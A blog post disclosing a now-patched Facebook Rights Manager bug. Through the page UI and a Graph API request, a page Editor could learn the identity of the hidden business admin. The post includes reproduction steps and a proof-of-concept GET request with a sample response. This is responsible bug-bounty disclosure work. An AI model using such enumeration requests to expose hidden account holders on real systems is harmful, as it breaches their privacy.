الخميس، 22 أغسطس 2019

Rights Manager Graph API Disclosure of business employee to non business employee

i found bug in Graph API on Facebook Rights Manager leads to the  non-business employee to Disclosure of business employee



Summary:

Vulnerability Type: Identification / Privacy
Product Area: Pages
The malicious user can Disclosure of business employee to non business employee using Reference Files in Rights Manager 

Description:

Facebook offers a Copyrighting Video manager for video content creators for pages on Facebook, Through which the creator can follow who copies their videos and republishes them without permission. More info : "https://rightsmanager.fb.com/"

When accepting your request to activate the tool on your page enter your page from "Business admin account" go to the link "https://web.facebook.com/YourPage/publishing_tools/?section=ALL_REFERENCE_FILES" then add Reference video, after add Reference file Look at the column "Date Added" You'll see that the column contains your account information.

Now if (Admin,Editor) page employee go to the link "https://web.facebook.com/YourPage/publishing_tools/?section=ALL_REFERENCE_FILES" you can identification business admin Just by looking at the "Date Added" column,

Impact:

Disclosure of business employee identity to non business employee.

Explain impact:

Business employee's identity is disclosed to a non-business page admin through the Rights Manager video_media_copyrights Graph API. Normally, business admins are hidden to non-business page users.

Setup:

use this link to learn how to add copyright manger in your page "https://rightsmanager.fb.com/"

Steps:

1. Create Page and add Editor to page employee.
2. Create business account.
3 Link the page with business manger.
4. Use this link to learn how to add copyright manger in your page "https://rightsmanager.fb.com/"
5. after accepting copyright manger in your page upload any video
6. Now from admin business account go to the link "https://web.facebook.com/YourPage/publishing_tools /?section=ALL_REFERENCE_FILES"
7. Click in "Add Files" Then add video to Reference Files.
8. Now if Admin or Editor in page employee go to the link "https://web.facebook.com/YourPage/publishing_tools/?section=ALL_REFERENCE_FILES" can detect business admin

PoC Get Request :


GET /v2.6/YourPage/video_media_copyrights?access_token=Editor_Token&fields=["creator"] HTTP/1.1
Host: graph.facebook.com

Response:

{
    "data": [
        {
            "creator": {
                "name": "Jafar Abo Nada", 
                "id": "100002271816418"
            }, 
            "monitoring_status": "COPYRIGHTED", 
            "id": "2511847998861026", 
            "reference_owner_id": "936928013019707"
        }, 




Follow me on Twitter  @jafar_abu_nada Facebook  Jafar Abo Nada


Timeline:

Jul-8-2019: Report sent

.Jul-12-2019: Facebook Reproduce Report

Jul-15-2019: Confirmation of submission by Facebook

Aug-5-2019: Confirmation of patch by Facebook

Aug-22-2019: Bounty awarded by Facebook


ليست هناك تعليقات:

إرسال تعليق

أخبار

اخبار تقنية (132) اندرويد (89) تقنية (75) مسابقة أفضل تدوينة (60) ايفون (51) تطبيقات (41) فيسبوك - facebook (24) واتساب - whatsapp (23) جوجل - Google (13) حرب الالكترونية (10) سامسونغ - Samsung (9) يوتيوب - youtube (9) WiFi (7) تقارير و دراسات (7) منوعات (7) هواتف - phone (7) SS7 (6) apple (6) hacker news (6) zoom (6) VPN (5) hacker (5) instagram - أنستقرام (5) SCADA (4) 5G (3) IOS (3) Programming Language (3) android (3) android malware (3) artificial intelligence (3) iphone (3) network (3) os (3) أبتكارات و أختراعات (3) تعلم البرمجة (3) هواوي - huawei (3) +Apple TV (2) Android Trojan (2) COVID-19 (2) LiFi (2) Twitter (2) WhatsApp Desktop (2) WhatsApp Web (2) application (2) checklist (2) coronavirus (2) dns (2) google paly (2) microsoft teams (2) news (2) php (2) privacy (2) scan netwok (2) الجيل الخامس (2) باركود (2) برمجة (2) تويتر (2) خصوصية (2) روبوت (2) روت - root (2) سوني - Sony (2) شبكات (2) قواعد البيانات (2) نظام التشغيل (2) واي فاي (2) AI (1) Air Force (1) AirPlay (1) Apple TV (1) Bitdefender (1) Bluetooth (1) CSSLP (1) Cambridge Analytica (1) Certified (1) Cisco (1) Comodo (1) CryptoAPI (1) Darknet (1) Defcon (1) DoH (1) E2EE (1) ECES (1) Egregor (1) FIN8 (1) Fitbit (1) Front end (1) Full HD (1) GCFA (1) GDPR (1) GPEN (1) GandCrab (1) Google Takeout (1) HTC (1) Hidden Cobra (1) IoT (1) JavaScript (1) Kodachi (1) LG (1) Lazarus Group (1) Meta (1) MongoDB (1) Netflix (1) OSINT (1) Oneplus (1) Oneplus 8 filter (1) Operating System (1) R (1) RCM (1) RCS (1) RitaVPN (1) STEGANOGRAPHY (1) Sonos (1) StarOS (1) TCP/IP (1) TOR (1) TOR Browser (1) TV show (1) Trend Micro (1) USITC (1) Ultra HD (1) VISA (1) Vultur (1) WATSAPP DARK (1) WhatsApp hacked (1) White Rabbit (1) Yandex (1) anonymity (1) big data (1) bitcoin (1) browser (1) call (1) camera (1) certification (1) cloud computing (1) cross-site (1) dark mode (1) darkmode (1) database (1) deep learning (1) deepwep (1) faceebok Messenger (1) fitbit watch (1) google project zero (1) goolge (1) hack life - اخترق حياتك (1) hacking satellite (1) iTunes (1) intercepter-ng (1) isp (1) joker (1) lan (1) moves (1) nessus (1) nmap (1) python (1) robotics (1) robotics revolution (1) smb1 (1) ssl (1) tarcking (1) tls (1) video call (1) voip (1) wan (1) web app (1) windows (1) أكاديمة حسوب (1) التعلّم العميق (1) الويب العميق (1) الويب المظلم (1) انترنت الاشياء (1) بيتكون (1) تطبيقات الطقس (1) تطبيقات الويب (1) تقنية 5G (1) تقينة الجيل الخامس (1) خدمات سحابيه (1) خوارزمية القيصر (1) دارك نبيت (1) ستاكس نت (1) شودان (1) علم أخفاء البيانات (1) علم الحاسوب (1) كتب (1) لغات البرمجة (1) مراجعات (1) مزود الخدمة (1) نصائح تقنية (1) هندسة البرمجيات (1)